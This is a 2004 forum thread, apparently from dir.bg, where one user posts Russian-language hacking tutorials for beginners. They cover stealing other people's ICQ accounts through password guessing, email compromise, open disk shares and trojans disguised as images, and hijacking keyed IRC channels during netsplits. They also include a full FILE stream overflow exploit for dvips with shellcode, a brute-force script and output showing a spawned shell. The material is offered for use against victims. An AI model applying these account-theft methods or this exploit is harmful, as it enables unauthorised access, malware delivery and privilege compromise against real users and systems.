Про то, что делать, если письмо пришло поздно и вы не успели хакнуть вашего бывшего собеседника или вы хотите узнать IP какого-нибудь психа, который вас облаял, ушел в игнор и смотался - напишу потом, а то и так целая курсовая работа вышла=), пишите отклики - если их будет мало, писать не буду... Да, я признаю, что именно эта статья конечно же "недохакерская", но она ориентирована на новичков, простите уж... Надеюсь что до следующей встречи;) на этом сайте!!!

Всего наилучшего, спасибо за то, что дочитали эту статью до конца=))

Breaking the Waves




Редактирано от Lucky_Man на 09.10.04 23:53.



Тема :: Взлом тёти аси или icqнови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано11.10.04 21:57



Вам стал надоедать 9 значный номер который тяжело запомнить. Тогда читай эту статью.
Есть несколько способов добыть номер:
1)Брут форс:
Это перебор паролей по словарю или так -
aaa
aab
aac
.....
Этот способ можно использовать если жертва ламак и ставит пароль типа:
god
VIP
ADMIN
Tazik
myrzik
И т.д и тп. НО если у жертвы пароль вот такой: ^!@#)(]12a().::.()@#$## то вы
его подберёте через пару миллионов лет.

2)Использование жертвой одного и того же пароля:
У большинства людей пароль везде одинаковый. На чат ,на форум, на почту и асю ставится один и тот же пароль. Вы уже взломали шото. И теперь хотите забрать асю того чела которому поломали мыло. Попробуйте пароль от мыла к асе. Он на 75 процентов должен подойти.
3)Взлом мыла:
Смотрите инфу юзера и видите там шото типа lamak@mail.ru Далее идёте на мыил ру и ломаете его почту. Надеюсь что вы умеете ломать почту. Допустим вы ломанули почту. Идёте на сайт аси и говорите что забыли пароль. И ждёте его по взломанному адресу.
4)Шаринг дисков:
В одной из статей я писал про то как добывать инет через шары. Если вы это умеете то вы с лёгкостью сможете сделать себе аську. Заходите в поиск в асе и ищите америкосов. У них легко найти шестизначку. Далее смотрите его ип. Есть много прог для этого. Есть спец патчи для аси которые позволяют видеть ип того с кем ты говоришь. Далее заходите в вхо ис и узнаете диапазон ип прова которым пользуется америкос. Сканите. Если у него открыт диск с то вам повезло. Подключаете диск и ломитесь в директорию аськи. И там в папке 2000а или 2000б(в зависимости от версии аси )и там лежит файл 123456.dat(123456-номер аськи). Вы его тырите и расшифровуете спец прогой. Я пользуюсь ICQR INFORMATION. После открытия этой прогой дат файла поклацайте по закладкам В одной из закладок будет пароль. Всё, ася ваша. Осталось только поменять пароль на неё и спокойно юзать.
5)Против ламеров: Попросите их прислать вам файл номер аси.Дат Подходит тока для полных ламаков :) Если вы таким образом попытаетесь захватить 6 значку то у вас врятли чёто получится.
6)Трояны : Качаете какую ни будь порнуху. Далее скрешиваете её с трояном(любым).Переименовываете в файлнаме. джепег дофига пробелов .ексе И посылаете врагу. Далее всё понятно. Я предпочитаю засовывать троян в сетап файл и авп не кричит, и жертва подозрительных файлов не видит. На этом всё.

Breaking the Waves




Тема Захват канала IRC при сплитенови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано14.10.04 12:10



Рассмотрим следующий трюк, который возможно будет вам полезен. Он является особенностью работы IRC серверов, слинкованных в сеть. Примеры таких сетей все хорошо знают это EFnet, DALnet и другие.

Особенность замеченная мною состоит в том, что при сплитах, когда один или несколько серверов отлинковываются от основной сети в результате флуда или каких либо других действий, если зайти на сервер отлинковавшийся от остальной сети то, некоторые каналы совсем опустеют в случае, если никто из тех, кто находился на канале не подключался к IRC сети через этот сервер.

А канал при сплите лишается своих опций, таких как +i или +k из-за того, что он уничтожается так как никого не остается на канале.

В итоге, на сервере который в сплите, т.е. отделился на время от основной сети, мы можем зайти на каналы которые раньше были +i и +k, а теперь если попытаться войти в них они будут просто +nt. Естественно, после сплита, когда сервер подсоединиться к основной сети, сеть установит прежние опции. Но! Мы-то сидя на канале сможем увидеть этот момент установки +i и +k, следовательно мы можем узнать ключ на канал или повесить своего бота на +i канал. Вот пример:

*** ircd.lightning.net sets mode: +ntlk 9774496 encrypt

Это работает только для каналов средней величины, потому что на больших каналах обычно хоть один бот да сидит через отлинковавшийся сервер и канал на отсплитившимся сервере не будет уничтожен. Однако на каналах с маленьким ботнетом это трюк работает. А так же если на отлинковавшимся сервере осталось очень мало пользователей. В этом случае очень большая вероятность того, что на канале на который вы хотите зайти через этот сервер никто не сидел.

Кроме того, эта особенность будет работать в любых ирц сетях где есть сплиты и выполняется следующая политика. Любой сервак на efnet обязан быть скомпилированным с флагом NO_JOIN_ON_SPLIT, это означает, что когда ты попал на сплитанутый сервак тебе нельзя сделать join команду НИКУДА, пока не придёт сплит или не пройдёт время, отведённое на сплит. А когда происходит rejoin никого не кикает, производиться только синхронизация по modes канала, главные параметры канала будут взяты с того сервака, на котором TS (timestamp, время создания) канала меньше, то есть можно и опа поиметь, но при rejoin деопнуло бы.

Есть две политики каналов: NO_JOIN_ON_SPLIT и NO_CHANOP_ON_SPLIT. Положено юзать первое, но не везде и не всегда это используется. Итак примечаем заветный +i или +k канал и ждем сплита =). Понять, что произошел сплит, можно по вылету нескольких пользователей с канала одновременно примерно с таким сообщением :

*** addiction has quit IRC (ircd.charter.com irc.Prison.NET)
*** kelly0 has quit IRC (ircd.charter.com irc.Prison.NET)
*** kcvbgfdf has quit IRC (ircd.charter.com irc.Prison.NET)

Далее соединяемся с этим сервером (irc.Prison.NET). Если он действительно еще в сплите, то мы увидим примерно такое сообщение:

There are 353 users and 2123 invisible on 1 servers
6 IRC Operators online
5652 channels formed
I have 2476 clients and 0 servers
-
Current local users: 2476
Max: 3222
Current global users: 2476
Max: 78944
-
Highest connection count: 3223 (3222 clients) (110509 since server wa ed)
-
Message of the Day, irc.webgiro.se
End of /MOTD command.
-
-irc.webgiro.se- *** Notice -- server is currently in split-mode -

Обратите внимание на кол-во пользователей и число серверов, в данном примере видно, что на отсплитившимся сервере осталось около 2500 пользователей и только 5652 каналов остались не уничтоженными после сплита, из десятков тысяч в нормальном случае. Далее пытаемся зайти на канал который в основной сети +i или +k.

*** Now talking in #!!adm
*** irc.prison.net sets mode: +nt

И если нам повезет и на канале через этот сервер никто не сидел мы зайдем на пустой или с небольшим кол-вом пользователей канал. Они зашли уже после того как канал уничтожился и стал +nt. И все. Далее спокойно ждем окончания сплита:

*** ircd.lightning.net sets mode: +ntlk 9774496 encrypt
*** ircd.lightning.net sets mode: +ntlk 9774496 encrypt
*** Sopara (z@168.187.196.178) has joined #somechan
*** jcm (jm@68.14.48.48) has joined #somechan
*** eree[T] (Z@213.189.76.103) has joined #somechan
*** steeg (ZD@13.209.16.227) has joined #somechan
*** DCL (sphere@blackguard.net) has joined #somechan ....

+)))))), вот и все что нам требовалось узнать. Кроме того пока не пройдет сплит можно поискать интересных людей и каналы, так как теперь они без +s и мы можем увидеть кто где сидит.. что иногда весьма полезно... то есть можем скомпрометировать +s каналы найдя какого-нибудь бота или юзера и посмотрев по whois где он сидит, так как большая вероятность того, что некоторые из этих каналов на самом деле +s. Далее проявляйте выдумку и находчивость чтобы после сплита вас не забанили как чужака и не сменили ключ на канал =).

Удачи на ИРЦ!

Breaking the Waves




Тема :: File Stream Overflow: ничего сложногонови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано16.10.04 21:16



:: File Stream Overflow: ничего сложного

С каждым днем атаки становятся все сложнее, но их количество, как ни странно, не уменьшается, а даже наоборот... Общественность уже успела оценить атаки типа Shatter, Integer Overflow и т.д. В этот раз речь пойдет о FILE Stream Overflow. Хоть ее описание не является открытием, многим экспертам еще не приходилось ее эксплуатировать. А сообщения о уязвимостях такого типа практически не появляются в BUGTRAQ.

FILE Stream Overflow в переводе с английского означает переполнение файлового потока. Это переполнение буфера, но со своими нюансами. На практике реальных примеров использования этой уязвимости достаточно мало. Но если они есть вообще, то это уже стоит изучения. В данном документе я опишу атаку переполнения файлового потока на приложениях dvips и odvips.

Для начала давайте убедимся, что уязвимость существует вообще. Передадим приложению dvips строку, достаточную чтобы переполнить буффер:

bash-2.05a$ dvips `perl -e 'print "A" x 2048'`
This is dvips(k) 5.86 Copyright 1999 Radical Eye Software (www.radicaleye.com)

dvips: ! DVI file can't be opened.
Segmentation fault (core dumped)

Как видите все прошло гладко и буфер мы все-таки переполнили. Но что именно произошло? Давайте внимательно взглянем на дамп:

......
Core was generated by dvips AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 _IO_vfprintf (s=0x41414141, format=0x8069822 " ", ap=0xbfffef00) at vfprintf.c:270
270 vfprintf.c: No such file or directory.
in vfprintf.c
(gdb) bt
#0 _IO_vfprintf (s=0x41414141, format=0x8069822 " ", ap=0xbfffef00)
at vfprintf.c:270
#1 0x4009190a in fprintf (stream=0x41414141, format=0x8069822 " ")
at fprintf.c:32
#2 0x0805337f in error ()
#3 0x0804dd07 in strcpy () at ../sysdeps/generic/strcpy.c:31
#4 0x0804dd25 in error ()
#5 0x0804f522 in error ()
#6 0x4005617d in __libc_start_main (main=0x804e0f4 , argc=2,
ubp_av=0xbffff104, init=0x8048e98, fini=0x80668a8 ,
rtld_fini=0x4000a534 <_dl_fini>, stack_end=0xbffff0fc)
at ../sysdeps/generic/libc-start.c:129

Вот тут и начинается самое интересное... Все адреса функций нам известны и EIP нами не перезаписан, а "Segmentation fault" засверкал в консоли. На первый взгляд ситуация "немного" странная, неправда ли? А если взглянуть на регистры:

eax 0x41414141 1094795585
ecx 0x41414141 1094795585
edx 0x8069822 134649890
ebx 0x4015ae58 1075162712
esp 0xbfffe8c8 0xbfffe8c8
ebp 0xbfffeed0 0xbfffeed0
esi 0x8068c01 134646785
edi 0x8069822 134649890
eip 0x400889d4 0x400889d4

Что же мы видим, EAX и ECX перезаписаны нашим вводом. В тоже время EBP/EIP нами не перезаписан, а значит и указывать они должны на правильный адрес. Следовательно, мы переполнили структуру файлового потока. Далее попробуем переполнить поток так, чтобы он указывал на другой поток, например stdout, stderr,stdin, stdaux или stdprn.

(gdb) x/a stdout
0x40158200 <_IO_2_1_stdout_>: 0xfbad2084

Адрес stdout: 0x40158200, но использовать его не будем из-за нулей в указателе (а ноль это конец строки). Поэтому взглянем на stderr:

(gdb) x/a stderr
0x40158380 <_IO_2_1_stderr_>: 0xfbad2887

Это нам вполне подходит. Давайте на этот раз переполним файловый поток адресом stderr:

bash-2.05a$ dvips perl -e 'print "x80x83x15x40" x 2024'
This is dvips(k) 5.86 Copyright 1999 Radical Eye Software (www.radicaleye.com)

dvips: ! DVI file can't be opened.

userdict /end-hook knownif
SafetyEnclosure restore

Как видите на этот раз аварийного завершения программы не было. Значит мы на правильном пути. Логическим завершением этого документа будет выполнение произвольного кода. Но для этого нам должна быть известна структура файлового потока. Для этого снова переполним его и взглянем на stderr в образовавшемся дампе.

Вот, это структура файлового потока длинной в 160 байт. Но нас больше интересует вопрос: не имеются ли в этой структуре адреса переходов, которые можно использовать для исполнения произвольного кода? И вот что интересное мы можем увидеть.

Кажется мы нашли то, что искали, "IO file jumps" это указатель на функцию. Следовательно далее нам просто нужно создать поддельный файловый поток, заполненный адресами shellcode. Для этого необходимо сформировать буфер имеющий такую структуру:



Как видно, больших отличий от атаки на переполнение буфера нет. Переполняемый буфер теперь затирает файловый поток. А адрес перехода на shellcode сохраняется в этой структуре. Вот эксплоит, реализующий эту уязвимость:

#include
#include
#include

#define VERSION "0.3"
#define SIZE 3048

//шеллкод
char shellcode[]="x31xd2x52x68x6ex2fx73x68"
"x68x2fx2fx62x69x89xe3x52"
"x53x89xe1x8dx42x0bxcdx80";


int
main(int argc,char *argv[])
{
char buffer[4000];
int align,offset,pad,i;
long ffss_addr=0xbfffeecc, jmpaddr, shaddr;
if(argc!=4)
{
fprintf(stderr, " FILE Stream Overflow exploit for dvips ver%s "
"Usage : %s "
" Copyright 2k3 killah @ hack . gr ",VERSION,argv[0]);
exit(-1);
}

align=atoi(argv[1]);
offset=atoi(argv[2]);
pad=atoi(argv[3]);

ffss_addr += offset; // адрес поддельного файлового потока
jmpaddr = (ffss_addr+160); //таблица переходов=адрес поддельного файлового потока+160
shaddr = (jmpaddr+32); // адрес shellcode

fprintf(stderr, " fake FILE Stream Structure Address : [0x%x] "
" Jump-Table Address : [0x%x] "
" Shellcode Address : [0x%x] "
" align = [%d] | offset = [%d] | pading = [%d] ",ffss_addr,jmpaddr,shaddr,align,offset,pad);

/* выравнивание буфера */
for(i=0; i buffer=0x42;
/* дополнение буффера */
for(i=align; i buffer=0x41;
/* подделка файлового потока */
for(i=pad+align; i *(long *)&buffer=jmpaddr;
/* создание таблицы переходов */
for(i=align+160; i *(long *)&buffer=shaddr;
/* копирование shellcode в буффер */
memcpy(buffer+align+160+32,shellcode,strlen(shellcode));

/* заполняем остаток буфера адресом поддельной структуры потока *
* чтобы перезаписать старое значение и запустить код(shellcode)*/

for(i=strlen(shellcode)+160+32+align; i *(long *)&buffer=ffss_addr;

execl("/usr/share/texmf/bin/dvips", "dvips", buffer, NULL);
exit(0);
}

Адрес потока находится брутфорсом или с помощью GDB. Естественно, что удаленный пользователь не может воспользоваться такой роскошью как дебаггер, не имея шелла на удаленной машине. Поэтому для таких случаев подходит брутфорс. Вот его примерная реализация на Perl:

#!/usr/bin/perl
$MIN=-1000;
$MAX=1000;
while($MIN<$MAX)
{
printf(" offset : $MIN ");
system("./exploit 0 $MIN 3");
$MIN++;
}

Тут exploit это откомпилированый исходник описанного эксплоита. Так, при адресе поддельного потока файла равному -161, программа даст такие результаты:

fake FILE Stream Structure Address : [0xbfffee2b]
Jump-Table Address : [0xbfffeecb]
Shellcode Address : [0xbfffeeeb]
align = [0] | offset = [-161] | pading = [3]
This is dvips(k) 5.86 Copyright 1999 Radical Eye Software (www.radicaleye.com)
dvips: ! DVI file can't be opened.
sh-2.05a$

Великой сложности тут нет. Я думаю что те, которые удачно переполняли буфер, справятся и с этим. Ну а нет, так... :)

Breaking the Waves




Тема Re: Гид на Новака в Клуб Политика ... Прочети първнови [re: Pимлянин]  
Автор Чичko Пapичko ()
Публикувано17.10.04 02:33



Айде ходи в клуб Софтуер или Хакери и там ги занимавай с тези неща.




Страници по тази тема: 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | (покажи всички)
*Кратък преглед
Клуб :  


Clubs.dir.bg е форум за дискусии. Dir.bg не носи отговорност за съдържанието и достоверността на публикуваните в дискусиите материали.

Никаква част от съдържанието на тази страница не може да бъде репродуцирана, записвана или предавана под каквато и да е форма или по какъвто и да е повод без писменото съгласие на Dir.bg
За Забележки, коментари и предложения ползвайте формата за Обратна връзка | Мобилна версия | Потребителско споразумение
© 2006-2024 Dir.bg Всички права запазени.